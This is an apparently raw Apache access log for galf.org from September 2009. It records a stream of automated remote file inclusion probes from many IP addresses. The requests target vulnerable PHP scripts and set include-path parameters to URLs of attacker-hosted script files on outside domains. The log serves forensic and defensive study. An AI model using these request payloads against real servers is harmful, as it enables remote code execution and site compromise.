69.64.84.44 - - [07/Sep/2009:07:39:00 -0700] "GET /logs/access_090330.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.98.252.56 - - [07/Sep/2009:07:39:07 -0700] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
87.98.252.56 - - [07/Sep/2009:07:39:07 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
87.98.252.56 - - [07/Sep/2009:07:39:07 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
99.198.106.178 - - [07/Sep/2009:07:39:35 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.189.18.73 - - [07/Sep/2009:07:39:39 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.189.18.73 - - [07/Sep/2009:07:39:39 -0700] "GET /logs/access.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
99.198.106.178 - - [07/Sep/2009:07:39:40 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.189.18.73 - - [07/Sep/2009:07:39:40 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
99.198.106.178 - - [07/Sep/2009:07:39:40 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.64.84.44 - - [07/Sep/2009:07:41:32 -0700] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2726381_gsos7/injected.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:41:33 -0700] "GET /logs/access_090330.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:42:31 -0700] "GET /logs/access_090706.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:07:43:55 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:07:43:55 -0700] "GET /logs/access_090504.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:07:43:55 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.117.85.108 - - [07/Sep/2009:07:47:03 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
202.146.177.61 - - [07/Sep/2009:07:47:35 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
211.40.68.132 - - [07/Sep/2009:07:47:38 -0700] "GET /logs/access_090209.log/components/com_performs/performs.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.40.68.132 - - [07/Sep/2009:07:47:38 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.40.68.132 - - [07/Sep/2009:07:47:39 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.146.177.61 - - [07/Sep/2009:07:48:41 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:50:13 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.64.84.44 - - [07/Sep/2009:07:50:13 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.64.84.44 - - [07/Sep/2009:07:50:13 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.64.84.44 - - [07/Sep/2009:07:50:23 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:50:23 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:50:23 -0700] "GET /logs/access_090720.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:07:50:44 -0700] "GET /logs/access_090316.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:50:47 -0700] "GET /logs/access_090504.log%20%20//load_lang.php?_SERWEB[configdir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:50:47 -0700] "GET /logs/access_090119.log%20%20//load_lang.php?_SERWEB[configdir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:50:47 -0700] "GET /logs//load_lang.php?_SERWEB[configdir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:50:47 -0700] "GET /load_lang.php?_SERWEB[configdir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:50:57 -0700] "GET /logs/access_090504.log//load_lang.php?_SERWEB[configdir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:50:57 -0700] "GET /load_lang.php?_SERWEB[configdir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:51:03 -0700] "GET /logs/access_090810.log//load_lang.php?_SERWEB[configdir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [07/Sep/2009:07:51:26 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:52:08 -0700] "GET /logs/access_090504.log%20%20//load_lang.php?_SERWEB[configdir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [07/Sep/2009:07:52:08 -0700] "GET /logs/access_090119.log%20%20//load_lang.php?_SERWEB[configdir]=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.146.177.61 - - [07/Sep/2009:07:57:39 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9" "www.galf.org"
193.47.80.39 - - [07/Sep/2009:07:58:51 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.galf.org"
193.47.80.39 - - [07/Sep/2009:07:58:51 -0700] "GET /labia/ HTTP/1.1" 200 524 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:08:00:05 -0700] "GET /logs/access_090316.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:08:00:05 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:08:00:05 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.29.82.154 - - [07/Sep/2009:08:00:17 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.29.82.154 - - [07/Sep/2009:08:00:17 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
72.29.82.154 - - [07/Sep/2009:08:00:17 -0700] "GET /logs/access.log%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.64.84.44 - - [07/Sep/2009:08:02:55 -0700] "GET /logs/access.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.64.84.44 - - [07/Sep/2009:08:02:55 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.64.84.44 - - [07/Sep/2009:08:02:58 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.64.84.44 - - [07/Sep/2009:08:03:20 -0700] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:08:03:21 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.64.84.44 - - [07/Sep/2009:08:03:21 -0700] "GET /logs/access_090202.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:03:50 -0700] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:03:50 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:03:50 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:04:04 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:04:04 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:04:04 -0700] "GET /logs/access_090316.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:04:04 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:04:22 -0700] "GET /logs/access_090316.log//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:08:05:04 -0700] "GET /?_zb_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "www.galf.org"
61.47.7.71 - - [07/Sep/2009:08:05:05 -0700] "GET /logs/access_090223.log/e404.php?DOCUMENT_ROOT=http://saint56.pe.kr//bbs/skin/uks_vote_v3021/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [07/Sep/2009:08:05:06 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://saint56.pe.kr//bbs/skin/uks_vote_v3021/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:08:07:09 -0700] "GET /?_zb_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "galf.org"
69.64.84.44 - - [07/Sep/2009:08:07:34 -0700] "GET /logs////administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [07/Sep/2009:08:08:01 -0700] "GET ///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [07/Sep/2009:08:08:01 -0700] "GET /logs/access.log%20%20////administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
114.4.8.14 - - [07/Sep/2009:08:08:01 -0700] "GET /logs////administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
195.3.194.35 - - [07/Sep/2009:08:08:21 -0700] "GET /logs/access_090302.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://mrkz.hellospace.net/ids/id.sc03.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.3.194.35 - - [07/Sep/2009:08:08:21 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://mrkz.hellospace.net/ids/id.sc03.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.3.194.35 - - [07/Sep/2009:08:08:21 -0700] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://mrkz.hellospace.net/ids/id.sc03.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
114.4.8.14 - - [07/Sep/2009:08:08:22 -0700] "GET /logs/access.log%20%20////administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
195.3.194.35 - - [07/Sep/2009:08:08:48 -0700] "GET /logs/access_090420.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://mrkz.hellospace.net/ids/id.sc03.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:08:11:11 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:08:11:11 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:08:11:11 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
61.47.7.71 - - [07/Sep/2009:08:11:13 -0700] "GET /logs/access_090309.log/e404.php?DOCUMENT_ROOT=http://saint56.pe.kr//bbs/skin/uks_vote_v3021/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.24.35.80 - - [07/Sep/2009:08:15:05 -0700] "GET /logs/access.log//?_zb_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:08:15:05 -0700] "GET /logs//?_zb_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
81.24.35.80 - - [07/Sep/2009:08:15:05 -0700] "GET /?_zb_path=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "galf.org"
94.136.37.141 - - [07/Sep/2009:08:17:14 -0700] "GET /?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:08:18:12 -0700] "GET /logs//admin/includes/admin_header.php?level=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:08:18:12 -0700] "GET /logs/access_090119.log%20%20//admin/includes/admin_header.php?level=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:08:18:12 -0700] "GET /admin/includes/admin_header.php?level=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.96 - - [07/Sep/2009:08:19:05 -0700] "GET /logs/access.log/errors.php?error=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
80.67.26.96 - - [07/Sep/2009:08:19:05 -0700] "GET /logs/errors.php?error=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
80.67.26.96 - - [07/Sep/2009:08:19:05 -0700] "GET /errors.php?error=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:08:19:49 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:19:49 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:19:49 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:20:37 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:20:37 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:20:37 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.117.85.108 - - [07/Sep/2009:08:20:57 -0700] "GET /logs/access.log/errors.php?error=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
217.117.85.108 - - [07/Sep/2009:08:20:57 -0700] "GET /errors.php?error=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.75.245.36 - - [07/Sep/2009:08:21:24 -0700] "GET /logs/access.log/errors.php?error=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.75.245.36 - - [07/Sep/2009:08:21:24 -0700] "GET /logs/errors.php?error=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.75.245.36 - - [07/Sep/2009:08:21:24 -0700] "GET /errors.php?error=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.6.22.182 - - [07/Sep/2009:08:22:28 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.67.26.96 - - [07/Sep/2009:08:23:37 -0700] "GET /logs/access.log/errors.php?error=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
80.67.26.96 - - [07/Sep/2009:08:23:37 -0700] "GET /errors.php?error=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
80.67.26.96 - - [07/Sep/2009:08:23:37 -0700] "GET /logs/errors.php?error=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "galf.org"
94.75.245.36 - - [07/Sep/2009:08:23:40 -0700] "GET /logs/access.log%20%20/errors.php?error=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.75.245.36 - - [07/Sep/2009:08:24:04 -0700] "GET /logs/access.log/errors.php?error=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
94.75.245.36 - - [07/Sep/2009:08:24:04 -0700] "GET /logs/errors.php?error=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
94.75.245.36 - - [07/Sep/2009:08:24:04 -0700] "GET /errors.php?error=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "galf.org"
194.105.193.46 - - [07/Sep/2009:08:24:43 -0700] "GET /errors.php?error=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
194.105.193.46 - - [07/Sep/2009:08:24:43 -0700] "GET /logs/access.log/errors.php?error=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
194.105.193.46 - - [07/Sep/2009:08:24:43 -0700] "GET /logs/errors.php?error=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
190.144.44.36 - - [07/Sep/2009:08:25:16 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
190.144.44.36 - - [07/Sep/2009:08:25:16 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
